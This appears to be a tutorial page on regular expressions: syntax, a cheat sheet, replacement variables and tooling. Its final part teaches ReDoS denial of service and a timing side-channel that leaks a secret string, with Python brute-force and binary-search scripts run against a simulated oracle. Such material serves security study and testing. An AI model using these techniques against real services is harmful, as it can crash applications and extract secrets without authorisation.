Regular Expressions (RegEx)
Regular Expressions are a syntax for writing patterns to match against. Many symbols have a special meaning, allowing you to write complex rules in a very short string.
Regular Expressions (RegEx) are a way of writing patterns that many languages understand. Almost every language has some library or way to work with regular expressions, and they are really useful for quickly finding something.
The syntax for RegEx may be hard to read at first. There is not really a way to make comments, and they are supposed to be very compact. But after working with them for a bit and understanding all the rules, you can quickly understand what a RegEx does. One great site that I always use for testing and creating Regular Expressions is RegExr:
Another useful tool to visualize RegExes is Regexper. Just put a RegEx in there, and you'll get a nice image that explains the patterns, groups, etc.
Many languages have some library or native way to interpret Regular Expressions. Here are two examples:
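For instance, here is a minimal sketch in Python using the standard re module. The log line format and the parse_user helper are made up for illustration.

```python
import re

# Hypothetical log format, used only for this illustration.
USER_PATTERN = re.compile(r"user=(\w+) id=(\d+)")

def parse_user(line):
    """Return (name, id) from a line like 'user=alice id=42', or None if absent."""
    match = USER_PATTERN.search(line)
    if match is None:
        return None
    # group(1) and group(2) are the two (...) capture groups in the pattern
    return match.group(1), int(match.group(2))

if __name__ == "__main__":
    print(parse_user("2024-05-01 ERROR user=alice id=42"))
    print(parse_user("nothing to see here"))
```

Compiling the pattern once with re.compile and reusing it is a common choice when the same pattern is applied to many lines.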
To search through files or command output with these regular expressions, you can use grep, which supports Perl-compatible regular expressions with the -P option (wrap the pattern in ' single quotes to avoid shell escaping issues).
Lots of code editors (IDEs) also allow you to search through your code using regular expressions. This can be really powerful in combination with the Replace feature to transform a pattern in your code without doing everything by hand. You can often enable this feature by clicking a .* button.
The MDN web docs have some detailed explanations of all the special characters RegEx uses, so check those out to fully understand it from the ground up. If you're already a bit familiar with how RegEx works, here's a list of all the special characters and what they do:
.              Any character except newline
\w \d \s       Word, digit, whitespace
\W \D \S       Not word, digit, whitespace
[abc]          Any of a, b, or c
[^abc]         Not a, b, or c
[a-g]          Character between a & g
^abc$          Start / end of the string
\b \B          Word, not-word boundary
\. \* \\       Escaped special characters
\t \n \r       Tab, linefeed, carriage return
(abc)          Capture group
\1             Backreference to group #1
(?:abc)        Non-capturing group
(?=abc)        Positive lookahead
(?!abc)        Negative lookahead
a* a+ a?       0 or more, 1 or more, 0 or 1
a{5} a{2,}     Exactly five, two or more
a{1,3}         Between one & three
a+? a{2,}?     Match as few as possible
ab|cd          Match ab or cd
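A few of these constructs in action, as a small Python sketch. The sample text and the variable names are made up for illustration.

```python
import re

text = "The cat sat on the mat; the the end."

# \b(\w+) \1\b : a captured word followed by a space and the same word again
repeated = re.search(r"\b(\w+) \1\b", text)
repeated_word = repeated.group(1) if repeated else None

# \w+(?=;) : a word only if it is directly followed by ";" (the ";" is not consumed)
before_semicolon = re.findall(r"\w+(?=;)", text)

# cat|mat : alternation, matches either literal
animals_or_mats = re.findall(r"cat|mat", text)

# .+ is greedy and takes as much as possible, .+? is lazy and takes as little as possible
greedy = re.search(r"<.+>", "<a><b>").group()
lazy = re.search(r"<.+?>", "<a><b>").group()

if __name__ == "__main__":
    print(repeated_word, before_semicolon, animals_or_mats, greedy, lazy)
```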
Regular Expressions can also be used to replace matches with something else. By wrapping parts of the pattern in () groups, you can even insert the captured text back into the replacement. This is really useful for changing specific things around or inside your match, without doing it manually. Here are the variables you can use in the replacement string:
$& : Full match
$1 : First group
$2 : Second group
etc.
You can use $& anywhere in your replacement string to insert the full match. This is useful if you want to add some characters around the match, instead of changing it. You can also insert any group with $n, where n is the number of the group in your search pattern.
Some RegEx implementations use a slightly different syntax for these replacements. Python's re.sub, for example, uses a backslash (\1) instead of a dollar sign ($1).
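As a minimal sketch of replacements in Python (the helper names swap_names and bracket_numbers are made up for illustration): groups are referenced as \1, \2, and so on, and the full match, the equivalent of $&, is written \g<0>.

```python
import re

def swap_names(text):
    """Turn 'Last, First' into 'First Last' using two capture groups."""
    # \1 is the first (...) group, \2 the second
    return re.sub(r"(\w+), (\w+)", r"\2 \1", text)

def bracket_numbers(text):
    """Wrap every number in square brackets without changing it."""
    # \g<0> inserts the full match, like $& in other implementations
    return re.sub(r"\d+", r"[\g<0>]", text)

if __name__ == "__main__":
    print(swap_names("Lovelace, Ada"))
    print(bracket_numbers("a1 b22"))
```

Using raw strings (the r prefix) for both the pattern and the replacement keeps Python from interpreting the backslashes itself.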
ReDoS stands for "Regular Expression Denial of Service". It happens when a search pattern is so computationally expensive that the system takes a very long time to return the result. An attacker can use this to slow down a system, causing a Denial of Service. When writing Regular Expressions, it is easy to fall into pitfalls that make the computation required for some inputs grow exponentially, which is called "Catastrophic Backtracking".
To check if any regex has such a vulnerable pattern, you could use this tool to quickly find out:
It gives you a working example as well. For the RegEx (x+x+)+y, for example, an input like xxxxxxxxxxxxxxxxxxxxxxxxxx already takes a few seconds to compute, while adding a few more x's will make it run almost forever. A single request with such an input can make a vulnerable application hang and never recover, effectively crashing it.
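To see the growth for yourself, here is a minimal timing sketch using Python's built-in re module, which is a backtracking engine. The helper name time_match is made up, and the input lengths are deliberately kept small so the script finishes quickly. Exact timings depend on your machine and Python version.

```python
import re
import time

VULNERABLE = re.compile(r"(x+x+)+y")

def time_match(n):
    """Match n x's (with no trailing 'y') and return (match, seconds taken)."""
    payload = "x" * n  # the missing "y" forces the engine to try every way to split the x's
    start = time.perf_counter()
    result = VULNERABLE.match(payload)
    return result, time.perf_counter() - start

if __name__ == "__main__":
    # Small lengths only: each extra "x" makes the failing match noticeably slower.
    for n in range(10, 19, 2):
        result, seconds = time_match(n)
        print(f"n={n:2d} matched={result is not None} time={seconds:.4f}s")
```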
While DoS is a possibility, in some specific cases you can gain more from this vulnerability. The timing information can also leak something about the string being matched because some strings will parse faster than others.
If you have control over the Regular Expression, and some secret string is being matched by your RegEx, you could use this to create a RegEx that will be very slow if the first character is an "A", but very fast if the first character is not an "A". Then you can slowly brute-force the secret string character by character.
Such a pattern would be:
A smart regex engine will first check whether the string starts with <text>. If it does not, the engine stops instantly because it knows the pattern can never match. If it does start with <text>, the engine goes on to evaluate the rest of the pattern, (((((.*)*)*)*)*)!, which is the computationally expensive part. That way, if the application takes long to respond, we know that the string being matched starts with <text>.
Now we can try every possible letter in the place of <text> until the application hangs. Then we save the newly found character and brute-force the next character, etc. See an example implementation I made in Python below:
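The loop can be sketched roughly as follows. This is an illustration under stated assumptions, not the original implementation. The names build_pattern, make_simulated_oracle, and leak_secret are made up. The lookahead guard (?=...) in front of the expensive tail is an assumed shape for the pattern. The oracle is simulated locally: instead of timing a real request, it reports "slow" exactly when the cheap guard matches. In a real attack you would replace it with a function that sends the pattern to the target and compares the response time against a threshold.

```python
import re
import string

# The expensive part of the pattern, as described in the text above.
EXPENSIVE_TAIL = "(((((.*)*)*)*)*)!"

def build_pattern(prefix):
    # Assumed shape: a cheap lookahead guard, then the expensive tail.
    return f"^(?={re.escape(prefix)}){EXPENSIVE_TAIL}"

def make_simulated_oracle(secret):
    """Simulation only: stands in for 'did the target take long to respond?'."""
    def is_slow(pattern):
        guard = pattern[: -len(EXPENSIVE_TAIL)]  # keep only the cheap guard
        return re.match(guard, secret) is not None
    return is_slow

def leak_secret(is_slow, alphabet, max_length=64):
    """Recover the secret one character at a time using the slow/fast signal."""
    known = ""
    for _ in range(max_length):
        for candidate in alphabet:
            if is_slow(build_pattern(known + candidate)):
                known += candidate  # slow response: the guess is correct
                break
        else:
            return known  # no candidate was slow: end of the secret reached
    return known

if __name__ == "__main__":
    alphabet = string.ascii_letters + string.digits + "_{}"
    oracle = make_simulated_oracle("flag{r3gex}")
    print(leak_secret(oracle, alphabet))
```

re.escape is applied to the guessed prefix so that characters like { or . in the secret are treated literally rather than as RegEx syntax.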
Because RegEx is so flexible, it is possible to achieve Binary Search performance with your leaks. By providing a range of characters like [a-m], the true/false response tells you a lot more than whether one specific character is in that position. False means that the whole range can be discarded, and True means the correct character is somewhere in there. You can then provide a smaller range like [a-g] and keep halving, so each character takes roughly log2(n) requests instead of the up to n requests needed by pure brute-force, where n is the size of the alphabet.
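A minimal sketch of that halving strategy, assuming the secret consists of printable ASCII and that you have some true/false oracle for "does this pattern match the secret?". The names class_pattern, leak_with_binary_search, and the locally simulated oracle are made up for illustration.

```python
import re

def class_pattern(known, low, high):
    # Known prefix, then one character in the code point range [low-high].
    # \xNN escapes avoid problems with characters that are special inside [...].
    return f"^{re.escape(known)}[\\x{low:02x}-\\x{high:02x}]"

def leak_with_binary_search(oracle, low=0x20, high=0x7E, max_length=64):
    """Recover a secret using about log2(range size) oracle calls per character."""
    known = ""
    for _ in range(max_length):
        if not oracle(class_pattern(known, low, high)):
            break  # nothing in the whole range matches: end of the secret
        lo, hi = low, high
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(class_pattern(known, lo, mid)):
                hi = mid      # True: the character is in the lower half
            else:
                lo = mid + 1  # False: discard the lower half
        known += chr(lo)
    return known

if __name__ == "__main__":
    secret = "flag{r3gex}"  # simulated target, for illustration only
    calls = 0

    def oracle(pattern):
        global calls
        calls += 1
        return re.match(pattern, secret) is not None

    print(leak_with_binary_search(oracle), "recovered in", calls, "oracle calls")
```

With 95 printable ASCII characters, each position needs at most 7 halving steps plus one check that a character exists at all, compared to up to 95 guesses with plain brute-force.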
See RegEx Binary Search for an example involving NoSQL Injection
For finding bypasses and edge cases or true values for a Regular Expression, check out the CrossHair: RegEx and more solver.